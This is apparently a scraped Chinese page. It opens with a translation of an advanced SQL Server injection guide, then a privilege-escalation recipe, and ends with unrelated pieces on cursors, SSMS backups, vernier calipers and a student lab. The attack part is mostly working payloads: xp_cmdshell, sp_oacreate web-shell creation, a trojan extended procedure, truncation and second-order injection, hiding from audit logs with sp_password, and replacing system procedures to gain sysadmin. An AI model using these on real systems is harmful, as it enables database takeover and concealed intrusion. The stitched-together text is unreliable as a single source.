SQL Server应用程序中的高级SQL注入
[xp_cmdshell]
许多存储过程被创建在SQLSERVER中,执行各种各样的功能,例如发送电子邮件和与注册表交互。
Xp_cmdshell是一个允许执行任意的命令行命令的内置的存储过程。例如:
Exec master..xp_cmdshell ’dir’
将获得SQLSERVER进程的当前工作目录中的目录列表。
Exec master..xp_cmdshell ’net user’
将提供服务器上所有用户的列表。当SQLSERVER正常以系统帐户或域帐户运行时,攻击者可以做出更严重的危害。
[xp_regread]
另一个有用的内置存储过程是xp_regXXXX类的函数集合。
Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumkeys
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite
这些函数的使用方法举例如下:
exec xp_regread HKEY_LOCA L_MACHINE,’SYSTEM\CurrentControlSet\Services\lanmanserver\parameters’, ’nullsessionshares’
这将确定什么样的会话连接在服务器上是可以使用的
exec xp_regenumvalues HKEY_LOCAL_MACHINE,’SYSTEM\CurrentControlSet\Services\snmp\parameters\validcom munities’
这将显示服务器上所有SNMP团体配置。在SNMP团体很少被更改和在许多主机间共享的情况下,有了这些信息,攻击者或许会重新配置同一网络中的网络设备。
这很容易想象到一个攻击者可以利用这些函数读取SAM,修改系统服务的配置,使它下次机器重启时启动,或在下次任何用户登陆时执行一条任意的命令。
[其他存储过程]
xp_servicecontrol过程允许用户启动,停止,暂停和继续服务:
exec master..xp_servicecontrol ’start’,’schedule’
exec master..xp_servicecontrol ’start’,’server’
下表中列出了少量的其他有用的存储过程:
Xp_availablemedia 显示机器上有用的驱动器
Xp_dirtree 允许获得一个目录树
Xp_enumdsn 列举服务器上的ODBC数据源
Xp_loginconfig Reveals information about the security mode of the server
Xp_makecab 允许用户在服务器上创建一个压缩文件
Xp_ntsec_enumdomains 列举服务器可以进入的域
Xp_terminate_process 提供进程的进程ID,终止此进程
[Linked Servers]
SQL SERVER提供了一种允许服务器连接的机制,也就是说允许一台数据库服务器上的查询能够操作另一台服务器上的数据。这个链接存放在master.sysservers表中。如果一个连接的服务器已经被设置成使用’sp_addlinkedsrvlogin’过程,当前可信的连接不用登陆就可以访问到服务器。’openquery’函数允许查询脱离服务器也可以执行。
[Custom extended stored procedures]
扩展存储过程应用程序接口是相当简单的,创建一个携带恶意代码的扩展存储过程动态连接库是一个相当简单的任务。使用命令行有几个方法可以上传动态连接库到SQL服务器上,还有其它包括了多种自动通讯的通讯机制,比如HTTP下载和FTP脚本。
一旦动态连接库文件在机器上运行即SQL服务器能够被访问——这不需要它自己是SQL服务器——攻击者就能够使用下面的命令添加扩展存储过程(这种情况下,我们的恶意存储过程就是一个能输出服务器的系统文件的小的木马):
Sp_addextendedproc ’xp_webserver’,’c:\temp\xp_foo.dll’
在正常的方式下,这个扩展存储过程可以被运行:
exec xp_webserver
一旦这个程序被运行,可以使用下面的方法将它除去:
xp_dropextendedproc ’xp_webserver’
[将文本文件导入表]
使用’bulk insert’语法可以将一个文本文件插入到一个临时表中。简单地创建这个表:create table foo( line varchar(8000) )
然后执行bulk insert操作把文件中的数据插入到表中,如:
bulk insert foo from ’c:\inetpub\wwwroot\process_login.asp’
可以使用上述的错误消息技术,或者使用’union’选择,使文本文件中的数据与应用程序正常返回的数据结合,将数据取回。这个用来获取存放在数据库服务器上的脚本源代码或者ASP 脚本代码是非常有用的。
[使用bcp建立文本文件]
使用’bulk insert’的相对技术可以很容易建立任意的文本文件。不幸的是这需要命令行工具。’bcp’,即’bulk copy program’
既然bcp可以从SQL服务进程外访问数据库,它需要登陆。这代表获得权限不是很困难,既然攻击者能建立,或者利用整体安全机制(如果服务器配置成可以使用它)。
命令行格式如下:
bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp –c -Slocalhost –Usa –Pfoobar
’S’参数为执行查询的服务器,’U’参数为用户名,’P’参数为密码,这里为’foobar’ [ActiveX automation scripts in SQL SERVER]
SQL SERVER中提供了几个内置的允许创建ActiveX自动执行脚本的存储过程。这些脚本和运行在windows脚本解释器下的脚本,或者ASP脚本程序一样——他们使用VBScript或javascript书写,他们创建自动执行对象并和它们交互。一个自动执行脚本使用这种方法书写可以在Transact-SQL中做任何在ASP脚本中,或者WSH脚本中可以做的任何事情。为了阐明这鞋,这里提供了几个例子:
(1)这个例子使用’wscript.shell’对象建立了一个记事本的实例:
wscript.shell example
declare @o int
exec sp_oacreate ’wscript.shell’,@o out
exec sp_oamethod @o,’run’,NULL,’notepad.exe’
我们可以通过指定在用户名后面来执行它:
Username:’; declare @o int exec sp_oacreate ’wscript.shell’,@o out exec sp_oamethod @o,’run’,NULL,’notepad.exe’—
(2)这个例子使用’scripting.filesystemobject’对象读一个已知的文本文件:
--scripting.filesystemobject example – read a known file
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ’opentextfile’, @f out, ’c:\boot.ini’, 1
exec @ret=sp_oamethod @f,’readline’,@line out
while(@ret=0)
begin
print @line
exec @ret=sp_oamethod @f,’readline’,@line out
end
(3)这个例子创建了一个能执行通过提交到的任何命令:
-- scripting.filesystemobject example –create a ’run this’.asp file
declare @o int,@f int,@t int,@ret int
exec sp_oacreate ’scripting.filesystemobject’,@o out
exec sp_oamethod @o,’createtextfile’,@f out,’c:\inetpub\wwwroot\foo.asp’,1
exec @ret=sp_oamethod @f,’writeline’,NULL,’’
需要指出的是如果运行的环境是WIN NT4+IIS4平台上,那么通过这个程序运行的命令是以系统权限运行的。在IIS5中,它以一个比较低的权限IWAM_XXXaccount运行。
(4)这些例子阐述了这个技术的适用性;它可以使用’speech.voicetext’对象引起SQL SERVER 发声:
declare @o int,@ret int
exec sp_oacreate ’speech.voicetext’,@o out
exec sp_oamethod @o,’register’,NULL,’foo’,’bar’
exec sp_oasetproperty @o,’speed’,150
exec sp_oamethod @o,’speak’,NULL,’all your sequel servers are belong to,us’,528 waitfor delay ’00:00:05’
我们可以在我们假定的例子中,通过指定在用户名后面来执行它(注意这个例子不仅仅是注入一个脚本,同时以admin权限登陆到应用程序):
Username:admin’;declare @o int,@ret int exec sp_oacreate ’speech.voicetext’,@o out exec sp_oamethod @o,’register’,NULL,’foo’,’bar’ exec sp_oasetproperty @o,’speed’,150 exec sp_oamethod @o,’speak’,NULL,’all your sequel servers are belong to us’,528 waitfor delay ’00:00:05’--
[存储过程]
传说如果一个ASP应用程序在数据库中使用了存储过程,那么SQL注入是不可能的。这句话只对了一半,这要看ASP脚本中调用这个存储过程的方式。
本质上,如果一个有参数的查询被执行,并且用户提供的参数通过安全检查才放入到查询中,那么SQL注入明显是不可能发生的。但是如果攻击者努力影响所执行查询语句的非数据部分,这样他们就可能能够控制数据库。
比较好的常规的标准是:
?如果一个ASP脚本能够产生一个被提交的SQL查询字符串,即使它使用了存储过程也是能够引起SQL注入的弱点。
?如果一个ASP脚本使用一个过程对象限制参数的往存储过程中分配(例如ADO的用于参数收集的command对象),那么通过这个对象的执行,它一般是安全的。
明显地,既然新的攻击技术始终地被发现,好的惯例仍然是验证用户所有的输入。
为了阐明存储过程的查询注入,执行以下语句:
sp_who ’1’ select * from sysobjects
or
sp_who ’1’;select * from sysobjects
任何一种方法,在存储过程后,追加的查询依然会执行。
[高级SQL注入]
通常情况下,一个web应用程序将会过滤单引号(或其他符号),或者限定用户提交的数据的长度。
在这部分,我们讨论一些能帮助攻击者饶过那些明显防范SQL注入,躲避被记录的技术。[没有单引号的字符串]
有时候开发人员会通过过滤所有的单引号来保护应用程序,他们可能使用VBScript中的replace函数或类似:
function escape(input)
input=replace(input,"’","’’")
escape=input
end function
无可否认地这防止了我们所有例子的攻击,再除去’;’符号也可以帮很多忙。但是在一个大型的应用程序中,好象个别值期望用户输入的是数字。这些值没有被限定,因此为攻击者提供了一个SQL注入的弱点。
如果攻击者想不使用单引号产生一个字符串值,他可以使用char函数,例如:
insert into users values(666,
char(0x63)+char(0x68)+char(0x72)+char90x69)+char(0x73),
char(0x63)+char(0x68)+char(0x72)+char90x69)+char(0x73),
0xffff)
这就是一个能够往表中插入字符串的不包含单引号的查询。
淡然,如果攻击者不介意使用一个数字用户名和密码,下面的语句也同样会起作用:insert into users values(667,
123,
123,
oxffff)
SQL SERVER自动地将整型转化为varchar型的值。
[Second-Order SQL Injection]
即使应用程序总是过滤单引号,攻击者依然能够注入SQL同样通过应用程序使数据库中的数据重复使用。
例如,攻击者可能利用下面的信息在应用程序中注册:
Username:admin’—
Password:password
应用程序正确过滤了单引号,返回了一个类似这样的insert语句:
insert into users values(123,’admin’’—’,’password’,0xffff)
我们假设应用程序允许用户修改自己的密码。这个ASP脚本程序首先保证用户设置新密码前拥有正确的旧密码。代码如下:
username = escape( Request.form("username") );
oldpassword = escape( Request.form("oldpassword") );
newpassword = escape( Request.form("newpassword") );
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = ’" + username + "’ and password = ’" + oldpassword + "’";
rso.open( sql, cn );
if (rso.EOF)
{
…
设置新密码的代码如下:
sql = "update users set password = ’" + newpassword + "’ where username = ’" + rso("username") + "’"
rso("username")为登陆查询中返回的用户名
当username为admin’—时,查询语句为:
update users set password = ’password’ where username=’admin’—’
这样攻击者可以通过注册一个admin’—的用户来根据自己的想法来设置admin的密码。
这是一个非常严重的问题,目前在大型的应用程序中试图去过滤数据。最好的解决方法是拒绝非法输入,这胜于简单地努力去修改它。这有时会导致一个问题,非法的字符在那里是必要的,例如在用户名中包含’符号,例如
O’Brien
从一个安全的观点来看,最好的解答是但引号不允许存在是一个简单的事实。如果这是无法接受的话,他们仍然要被过滤;在这种情况下,保证所有进入SQL查询的数据都是正确的是最好的方法。
如果攻击者不使用任何应用程序莫名其妙地往系统中插入数据,这种方式的攻击也是可能的。应用程序可能有email接口,或者可能在数据库中可以存储错误日志,这样攻击者可以努力控制它。验证所有数据,包括数据库中已经存在的数据始终是个好的方法。确认函数将被简单地调用,例如:
if(not isValid("email",request.querystring("email"))) then
response.end
或者类似的方法。
[长度限制]
为了给攻击者更多的困难,有时输入数据的长度是被限制的。当这个阻碍了攻击时,一个小的SQL可以造成很严重的危害。例如:
Username:’;shutdown—
这样只用12个输入字符就将停止SQL SERVER实例。另一个例子是:
drop table
如果限定长度是在过滤字符串后应用将会引发另一个问题。假设用户名被限定16个字符,密码也被限定16个字符,那么下面的用户名和密码结合将会执行上面提到的shutdown命令:
Username:aaaaaaaaaaaaaaa’
Password:’; shutdown—
原因是应用程序尝试去过滤用户名最后的单引号,但是字符串被切断成16个字符,删除了过滤后的一个单引号。这样的结果就是如果密码字段以单引号开始,它可以包含一些SQL 语句。既然这样查询看上去是:
select * from users where username=’aaaaaaaaaaaaaaa’’ and password=’’’;shutdown—实际上,查询中的用户名已经变为:
aaaaaaaaaaaaaaa’ and password=’
因此最后的SQL语句会被执行。
[审计]
SQL SERVER包含了丰富的允许记录数据库中的各种事件的审计接口,它包含在sp_traceXXX类的函数中。特别有意思的是能够记录所有SQL语句,然后在服务器上执行的T-SQL的事件。如果这种审计是被激活的,我们讨论的所有注入的SQL查询都将被记录在数据库中,一个熟练的数据库管理员将能够知道发生了什么事。不幸地,如果攻击者追加以下字符串:
Sp_password
到一个Transact-SQL语句中,这个审计机制记录日志如下:
--’sp_password’ was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
这种行为发生在所有的T-SQL日记记录中,即使’sp_password’发生在一个注释中。这个过程打算通过sp_password隐藏用户的密码,但这对于一个攻击者来说是非常有用的方法。因此,为了隐藏所有注入,攻击者需要简单地在’—’注释字符后追加sp_password,例如:Username:admin’—sp_password
事实上一些被执行的SQL将被记录,但是查询本身将顺利地从日志中消失。
[防范]
这部分讨论针对记述的攻击的一些防范。我们将讨论输入确认和提供一些简单的代码,然后我们将从事SQL SERVER锁定。
[输入验证]
输入验证是一个复杂的题目。比较有代表性的是,自从过于严密地确认倾向于引起部分应用程序的暂停,输入确认问题很难被解决,在项目开发中投入很少的注意力在输入确认上。输入确认不是倾向于将它加入到应用程序的功能当中,因此它一般会被忽视。
下面是一个含有简单代码的讨论输入确认的大纲。这个简单的代码不能直接用于应用程序中,但是它十分清晰地阐明了不同的策略。
不同的数据确认方法可以按以下分类:
1)努力修改数据使它成为正确的
2)拒绝被认为是错误的输入
3)只接收被认为是正确的输入
第一种情况有一些概念上的问题;首先,开发人员没必要知道那些是错误数据,因为新的错误数据的形式始终被发现。其次,修改数据会引起上面描述过的数据的长度问题。最后,二次使用的问题包括系统中已经存在数据的重新使用。
第二种情况也存在第一种情况中的问题;已知的错误输入随着攻击技术的发展变化。
第三种情况可能是三种中最好的,但是很难实现。
从安全角度看合并第二种方法和第三种方法可能是最好的方法——只允许正确的输入,然后搜索输入中已知的错误数据。
带有连接符号的姓名的问题对于体现合并两种方法的必要性是一个好的例子:
Quentin Bassington-Bassington
我们必须在正确输入中允许连接符号,但是我们也意识到字符序列’—’对SQL SERVER很重要。
当合并修改数据和字符序列确认时,会出现另一个问题。例如,如果我们应用一个错误过滤在除去单引号之后去探测’—’,’select’和’union’,攻击者可以输入:
uni’on sel’ect @@version-’-
既然单引号被除去,攻击者可以简单地散布单引号在自己的错误的字符串中躲避被发现。这有一些确认代码的例子:
方法一——过滤单引号
function escape(input)
input=replace(input,"’","’’")
escape=input
end function
方法二——拒绝已知的错误输入
function validate_string(input)
known_bad=array("select","insert","update","delete","drop","—","’")
validate_string=true
for i=lbound(known_bad) to ubound(known_bad)
if(instr(1,input,known_bad(i),vbtextcompare)0) then
validate_string=false
exit function
end if
next
end function
方法三——只允许正确的输入
function validatepassword(input)
good_password_ch ars=” abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789” validatepassword=true
for i=1 to len(input)
c=mid(input,I,1)
if(InStr(good_password_chars,c)=0) then
validatepassword=false
exit function
end if
next
end function
[SQL SERVER锁定]
在这指出的重要一点是锁定SQL SERVER是必要的;外面的是不安全的。这是一个但创建SQL SERVER时需要做的事情的简短的列表:
1.确定连接服务器的方法
a.确定你所使用的网络库是可用的,那么使用"Network Utility"
2.确定哪些帐户是存在的
a.为应用程序的使用创建一个低权限的帐户
b.删除不必要的帐户
c.确定所有帐户有强壮的密码;执行密码审计
3.确定哪些对象存在
a.许多扩展存储过程能被安全地移除。如果这样做了,应该移除包含在扩展存储过程代码中的’.dll’文件
b.移除所有示例数据库——例如’northwind’和’pubs’数据库
4.确定哪写帐户能过使用哪些对象
a.应用程序进入数据库所使用的帐户应该有保证能够使用它需要的对象的最小权限
5.确定服务器的补丁
a.针对SQL SERVER有一些缓冲区溢出和格式化字符串攻击,也有一些其他的安全补丁发布。应该存在很多。
6.确定什么应该被日志记录,什么应该在日志中结束。
利用Extended Stored Proc进行入侵开始了
入侵途径:利用db_owner在db_owner角色下添加SYSADMIN帐号可以修改sp_addlogin 和sp_addsrvrolemember这两个存储过程,绕过了验证部分。
具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp_addlogin
@loginame sysname
,@passwd sysname = Null
,@defdb ; ; sysname = 'master' -- UNDONE: DEFAULT
CONFIGURABLE
,@deflanguage sysname = Null
,@sid varbinary(16) = Null
,@encryptopt varchar(20) = Null
AS
-- SETUP RUNTIMEOPTIONS / DECLARE VARIABLES --
set nocount on
Declare @ret int -- return value of sp call
-- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,'sp_addlogin')
return (1)
end
-- VALIDATE LOGIN NAME AS:
-- (1) Valid SQL Name (SQL LOGIN)
-- (2) No backslash (NT users only)
-- (3) Not a reserved login name
execute @ret = sp_validname @loginame
if (@ret 0)
return (1)
if (charindex('\', @loginame) > 0)
begin
raiserror(15006,-1,-1,@loginame)
return (1)
end
--Note: different case sa is allowed.
if (@loginame = 'sa' or lower(@loginame) in ('public'))
begin
raiserror(15405, -1 ,-1, @loginame)
return (1)
end
-- LOGIN NAME MUST NOT ALREADY EXIST --
if exists(select * from master
.db
o.syslogins where loginname =
@loginame)
begin
raiserror(15025,-1,-1,@loginame)
return (1)
end
-- VALIDATE DEFAULT DATABASE --
IF db_id(@defdb) IS NULL
begin
raiserror(15010,-1,-1,@defdb)
return (1)
end
-- VALIDATE DEFAULT LANGUAGE --
IF (@deflanguage IS NOT Null)
begin
Execute @ret = sp_validlang @deflanguage
IF (@ret 0)
return (1)
end
ELSE
begin
select @deflanguage = name from master.dbo.syslanguages where langid = @@default_langid --server default
language
if @deflanguage is null
select @deflanguage = N'us_english'
end
-- VALIDATE SID IF GIVEN --
if ((@sid IS NOT Null) and (datalength(@sid) 16))
begin
raiserror(15419,-1,-1)
return (1)
end
else if @sid is null
select @sid = newid()
if (suser_sname(@sid) IS NOT Null)
begin
raiserror(15433,-1,-1)
return (1)
end
-- VALIDATE AND USE ENCRYPTION OPTION --
declare @xstatus smallint
select @xstatus = 2 -- access
if @encryptopt is null
select @passwd = pwdencrypt(@passwd)
else if @encryptopt = 'skip_encryption_old'
begin
select @xstatus = @xstatus | 0x800, -- old-style
encryption
@passwd = convert(sysname, convert(varbinary
(30), convert(varchar(30), @passwd)))
end
else if @encryptopt 'skip_encryption'
begin
raiserror(15600,-1,-1,'sp_addlogin')
return 1
end
-- ATTEMPT THE INSERT OF THE NEW LOGIN --
INSERT INTO master.dbo.sysxlogins VALUES
(NULL, @sid, @xstatus, getdate(),
getdate(), @loginame, convert(varbinary(256), @passwd),
db_id(@defdb), @deflanguage)
if @@error 0 -- this indicates we
saw
duplicate row
return (1)
-- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
exec('use master grant all to null')
-- FINALIZATION: RETURN SUCCESS/FAILURE --
raiserror(15298,-1,-1)
return (0) -- sp_addlogin
GO
OK,我们新建个用户exec master..sp_addlogin crisa
再drop procedure sp_addsrvrolemember,然后在IE里输入create procedure sp_addsrvrolemember
@loginame sysname, -- login name
@rolename sysname = NULL -- server role name
as
-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
set nocount on
declare @ret int, -- return value of sp call
@rolebit smallint,
@ismem int
-- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,'sp_addsrvrolemember')
return (1)
end
-- CANNOT CHANGE SA ROLES --
if @loginame = 'sa'
begin
raiserror(15405, -1 ,-1, @loginame)
return (1)
end
-- OBTAIN THE BIT FOR THIS ROLE --
select @rolebit = CASE @rolename
WHEN 'sysadmin' THEN 16
WHEN 'securityadmin' THEN 32
WHEN 'serveradmin' THEN 64
WHEN 'setupadmin' THEN 128
WHEN 'processadmin' THEN 256
WHEN 'diskadmin' THEN 512
WHEN 'dbcreator' THEN 1024
WHEN 'bulkadmin' THEN 4096
ELSE NULL END
-- ADD ROW FOR NT LOGIN IF NEEDED --
if not exists(select * from master.dbo.syslogins where loginname = @loginame)
begin
execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame if (@ret 0)
begin
raiserror(15007,-1,-1,@loginame)
return (1)
end
end
-- UPDATE ROLE MEMBERSHIP --
update master.dbo.sysxlogins set xstatus = xstatus | @rolebit,
xdate2 = getdate()
where name = @loginame and srvid IS NULL
-- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
exec('use master grant all to null')
raiserror(15488,-1,-1,@loginame,@rolename)
-- FINALIZATION: RETURN SUCCESS/FAILURE
return (@@error) -- sp_addsrvrolemember
GO
接着再exec master..sp_addsrvrolemember crisa,sysadmin
这样就建立了一个SA用户了,用SQL连接器连接上就OK了。
1.为何使用游标: 使用游标(cursor)的一个主要的原因就是把集合操作转换成单个记录处理方式。用SQL语言从数据库中检索数据后,结果放在内存的一块区域中,且结果往往是一个含有多个记录的集合。游标机制允许用户在SQL server内逐行地访问这些记录,按照用户自己的意愿来显示和处理这些记录。 2.如何使用游标: 一般地,使用游标都遵循下列的常规步骤: (1) 声明游标。把游标与T-SQL语句的结果集联系起来。 (2)打开游标。 (3)使用游标操作数据。 (4)关闭游标。 2.1.声明游标 DECLARE CURSOR语句SQL-92标准语法格式: DECLARE游标名[ INSENSITIVE ] [ SCROLL ] CURSOR FOR sql-statement Eg: Declare MycrsrVar Cursor FOR Select * FROM tbMyData 2.2打开游标 OPEN MycrsrVar 当游标被打开时,行指针将指向该游标集第1行之前,如果要读取游标集中的第1行数据,必须移动行指针使其指向第1行。就本例而言,可以使用下列操作读取第1行数据: FETCH FIRST from E1cursor 或FETCH NEXT from E1cursor 2.3 使用游标操作数据 下面的示例用@@FETCH_STATUS控制在一个WHILE循环中的游标活动 DECLARE E1cursor cursor FOR SELECT * FROM c_example OPEN E1cursor FETCH NEXT from E1cursor WHILE @@FETCH_STATUS = 0 BEGIN FETCH NEXT from E1cursor END CLOSE E1cursor DEALLOCATE E1cursor 2.4 关闭游标 使用CLOSE语句关闭游标 CLOSE { { [ GLOBAL ]游标名} |游标变量名} 使用DEALLOCATE语句删除游标,其语法格式如下: DEALLOCATE { { [ GLOBAL ]游标名} | @游标变量名
SQLSERVER数据库操作 ******操作前,请确定SQL的服务已经开启******** 一:登录进入sql数据库 1、开始---所有程序---Microsoft SQL Server 2005---SQL Server Management Studio Express 2、此时出现“连接到服务器”的对话框, “服务器名称”设置为SQL数据库所在机器的IP地址 “身份验证”设置为SQL Server身份验证或者Windows 身份验证 填写登录名和密码后,点击“连接”按钮,即可进入到SQL数据库操作界面。 二:新建数据库 登录进去后,右击“数据库”,选择—“新建数据库” 设置数据库名称,在下面的选项卡中还可以设置数据库的初始大小,自动增长,路径。 点击确定,一个数据库就建好了。 三:如何备份的数据库文件。 登录进入后,右击相应的需要备份数据库----选择“任务” 目标下的备份到,点击“添加”按钮可以设置备份数据库保存的路径。 四:如何还原备份的数据库文件。(以本地机器为例子) 1、设置服务器名称,点击右边的下拉框的三角,选择“浏览更多…”。 此时出现查找服务器对话框,选择“本地服务器”---点开“数据库引擎”前面 的三角---选中出现的服务器名称—确定。 (注:可以在“网络服务器”选项卡中设置网络服务器) 2、设置身份验证,选择为“windows身份验证” 3、点击连接按钮,进入数据库管理页面 4、右击“数据库”,选择“还原数据库”,出现还原数据库的对话框 还原的目标----目标数据库,这里设置数据库的名字 还原的源----选择“源设备”,在弹出的对话框中点击“添加”按钮,找到所备 份的数据库文件,确定。 5、此时,在还原数据库对话框中会出现所还原的数据库的信息。在前面选中所需还 原的数据库。确定。 6、为刚刚还原的数据库设置相应的用户。 a点开“安全性”---右击“登录名”---新建登录名 b 设置登录名(假如为admin),并设置为SQL Server身份验证,输入密码,去除 “强制实施密码策略”前的勾。 C 找到导入的数据库,右击此数据库----选择“属性”,在选择页中,点击“文件” 设置所有者,点击右边的按钮,选择“浏览”,找到相应的用户(如admin)。确 定。。 7、此时重新以admin的身份进入,就可操作相应的数据库。
游标卡尺是一种常用的量具,具有结构简单、使用方便、精度中等和测量的尺寸范围大等特点,可以用它来测量零件的外径、内径、长度、宽度、厚度、深度和孔距等,应用范围很广。 结构组成 游标卡尺由主尺和副尺(又称游标)组成。主尺与固定卡脚制成一体;副尺与活动卡脚制成一体,并能在主尺上滑动。游标卡尺有、、0.1mm三种测量精度。 读数方法 游标卡尺是利用主尺刻度间距与副尺刻度间距读数的。以13-2图0.02mm游标卡尺为例,主尺的刻度间距为1mm,当两卡脚合并时,主尺上49mm刚好等于副尺上50格,副尺每格长为=0.98mm。主尺与副尺的刻度间相关为1-0398=0.02mm,因此它的测量精度为0.02mm(副尺上直接用数字刻出) 游标卡尺读数分为三个步骤,下面以图13-3所示游标卡尺的某一状态为例进行说明。 1.在主尺上读出副尺零线以左的刻度,该值就是最后读数的整数部分。图示 33mm。 2.副尺上一定有一条与主尺的刻线对齐,在刻尺上读出该刻线距副尺的格 数,将其与刻度间距0.02mm相乘,就得到最后读数的小数部分。图示为 0.24mm。
3.将所得到的整数和小数部分相加,就得到总尺寸为33.24mm。 游标卡尺的使用方法 量具使用得是否合理,不但影响量具本身的精度,且直接影响零件尺寸的测量精度,甚至发生质量事故,对国家造成不必要的损失。所以,我们必须重视量具的正确使用,对测量技术精益求精,务使获得正确的测量结果,确保产品质量。 使用游标卡尺测量零件尺寸时,必须注意下列几点: 1.测量前应把卡尺揩干净,检查卡尺的两个测量面和测量刃口是否平直无 损,把两个量爪紧密贴合时,应无明显的间隙,同时游标和主尺的零位刻线要相互对准。这个过程称为校对游标卡尺的零位。 2.移动尺框时,活动要自如,不应有过松或过紧,更不能有晃动现象。用固 定螺钉固定尺框时,卡尺的读数不应有所改变。在移动尺框时,不要忘记松开固定螺钉,亦不宜过松以免掉了。 3.当测量零件的外尺寸时:卡尺两测量面的联线应垂直于被测量表面,不能 歪斜。测量时,可以轻轻摇动卡尺,放正垂直位置,图2-6所示。否则,量爪若在如图2-6所示的错误位置上,将使测量结果a比实际尺寸b要大; 先把卡尺的活动量爪张开,使量爪能自由地卡进工件,把零件贴靠在固定 量爪上,然后移动尺框,用轻微的压力使活动量爪接触零件。如卡尺带有微动装置,此时可拧紧微动装置上的固定螺钉,再转动调节螺母,使量爪接触零件并读取尺寸。决不可把卡尺的两个量爪调节到接近甚至小于所测尺寸,把卡尺强制的卡到零件上去。这样做会使量爪变形,或使测量面过早磨损,使卡尺失去应有的精度。
(1)批处理 (2) (2)变量 (3) (3)逻辑控制 (5) (4)函数 (7) (4.1)系统函数 (7) (4.2)自定义函数 (13) (5)高级查询 (23) (6)存储过程 (35) (7)游标 (36) (8)触发器 (50) SQL Server 数据库的高级操作 (1) 批处理 (2) 变量 (3) 逻辑控制 (4) 函数 (5) 高级查询 */ (1)批处理 将多条SQL语句作为一个整体去编译,生成一个执行计划,然后,执行! 理解批处理的关键在于"编译",对于由多条语句组成的一个批处理, 如果在编译时,其中,有一条出现语法错误,将会导致编译失败! create table t ( a int,
)
-- 如果多行注释中包含了批处理的标识符go -- 在编译的过程中代码将会被go分割成多个部分来分批编译-- 多行注释的标记将会被分隔而导致编译出错 -- 以下几条语句是三个非常经典的批处理 -- 你猜一下会添加几条记录! /* insert into t values (1,1) go */ insert into t values (2,2) go /* insert into t values (3,3) */ go -- 查询看添加了几条记录 select * from t
truncate table t (2)变量 -- 全局变量 SQL Server中全局变量由系统定义、系统维护,用户一般仅可对其进行读取!-- 查看SQL Server版本 print @@version -- 服务器名称 print @@servername -- 系统错误编号 insert into t values ('a','a') print @@error insert into t values ('a','a') if @@error = 245 print 'Error' -- SQL Server 版本的语言信息 print @@LANGUAGE -- 一周的第一天从星期几算起 print @@datefirst
机械式游标卡尺的使用方法 制作人:江老师 1、机械游标卡尺的简介 游标卡尺是精密的长度测量仪器,常见的机械游标卡尺如下图所示。它的量程为0~110mm,分 度值为0.1mm,由内测量爪、外测量爪、紧固螺钉、微调装置、主尺、游标尺、深度尺组成。 0~200mm以下规格的卡尺具有测量外径、内径、深度三种功能:
2、游标卡尺的零位校准: 步骤一:使用前,松开尺框上坚固螺钉,将尺框平稳拉开,用布将测量面、导向面擦干净; 步骤二:检查“零”位:轻推尺框,使卡尺两个量爪测量面合并,观察游标“零”刻线与尺身“零” 刻线应对齐,游标尾刻线与尺身相应刻线应对齐。否则,应送计量室或有关部门调整。 3、游标卡尺的测量方法:(外径) 步骤一:将被测物擦干净,使用时轻拿轻放; 步骤二:松开千分尺的固紧镙钉,校准零位,向后移动外测量爪,使两个外测量爪之间距离略
大于被测物体; 步骤三:一只手拿住游标卡尺的尺架,将待测物置于两个外测量爪之间,另一手向前推动活动外 测量尺,至活动外测量尺与被测物接触为止。 步骤四:读数。 注意:1)测量内孔尺寸时,量爪应在孔的直径方向上测量。 2)测量深度尺寸时,应使深度尺杆与被测工件底面相垂直。 4、游标卡尺的读数: 游标卡尺的读数主要分为三步: 1)看清楚游标卡尺的分度。10分度的精度是0.1mm,20分度的精度是0.05mm,50分度的精度 是0.02mm; 2)为了避免出错,要用毫米而不是厘米做单位; 3)看游标卡尺的零刻度线与主尺的哪条刻度线对准,或比它稍微偏右一点,以此读出毫米的整 数值; 4)再看与主尺刻度线重合的那条游标刻度线的数值n,则小数部分是nX精度,两者相加就是测量值; 深度测量 深度测量深度测量 深度测量 3 / 3 机械式游标卡尺的使用方法 机械式游标卡尺的使用方法机械式游标卡尺的使用方法 机械式游标卡尺的使用方法 5)游标卡尺不需要估读。
实验七 (1)创建并运行存储过程student_grade,要求实现如下功能:查询studb数据库中每个学生各门课的成绩,其中包括每个学生的sno、sname、cname和score。 create procedure student_grade as select student.sno,student.sname,https://www.doczj.com/doc/2f10388876.html,ame,student_course.score from student join student_course on student.sno=student_course.sno join course on https://www.doczj.com/doc/2f10388876.html,o=student_https://www.doczj.com/doc/2f10388876.html,o 运行结果代码: use Studb go execute student_grade go (2)创建并运行名为proc_exp的存储过程,要求实现如下功能:从student_course表中查询某一学生考试的平均成绩。 create procedure proc_exp @sname varchar(8) as begin select sname,AVG(score) from student join student_course on student.sno=student_course.sno where sname=@sname group by sname end 运行结果代码:
